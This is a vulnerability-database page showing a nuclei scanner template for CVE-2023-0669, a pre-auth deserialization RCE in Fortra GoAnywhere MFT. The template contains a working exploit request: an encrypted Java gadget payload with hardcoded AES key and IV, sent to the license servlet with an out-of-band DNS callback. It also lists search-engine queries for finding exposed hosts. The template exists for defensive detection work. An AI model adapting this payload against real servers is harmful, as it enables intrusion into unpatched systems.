Lucene search
K

Fortra GoAnywhere MFT - Remote Code Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 111 Views

Fortra GoAnywhere MFT susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object in the License Response Servlet. Successful exploitation could allow an attacker to execute arbitrary code on the affected system

Related
Refs
Code
id: CVE-2023-0669

info:
  name: Fortra GoAnywhere MFT - Remote Code Execution
  author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch
  severity: high
  description: |
    Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html
    - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1
    - https://infosec.exchange/@briankrebs/109795710941843934
    - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0669
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-0669
    cwe-id: CWE-502
    epss-score: 0.99999
    epss-percentile: 0.99996
    cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fortra
    product: goanywhere_managed_file_transfer
    shodan-query:
      - http.favicon.hash:1484947000
      - http.favicon.hash:1484947000,1828756398,1170495932
    fofa-query:
      - app="goanywhere-mft"
      - icon_hash=1484947000
      - icon_hash=1484947000,1828756398,1170495932
    zoomeye-query: app="fortra goanywhere-mft"
  tags: cve2023,cve,rce,goanywhere,oast,kev,fortra,vkev,vuln

http:
  - raw:
      - |
        POST /goanywhere/lic/accept HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded

        bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA==")))), '$2')}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'GoAnywhere'

      - type: status
        status:
          - 500
# digest: 4a0a00473045022100c3e6eff7899c71a55cab60a3f9232524df5038646434fc94dea06dc47918c8ba02200cebeb80d2c2966e959e7a839c63cafff210fd5aa0440df36c17692a4d3e2bdb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.17.2
EPSS0.99999
SSVC
111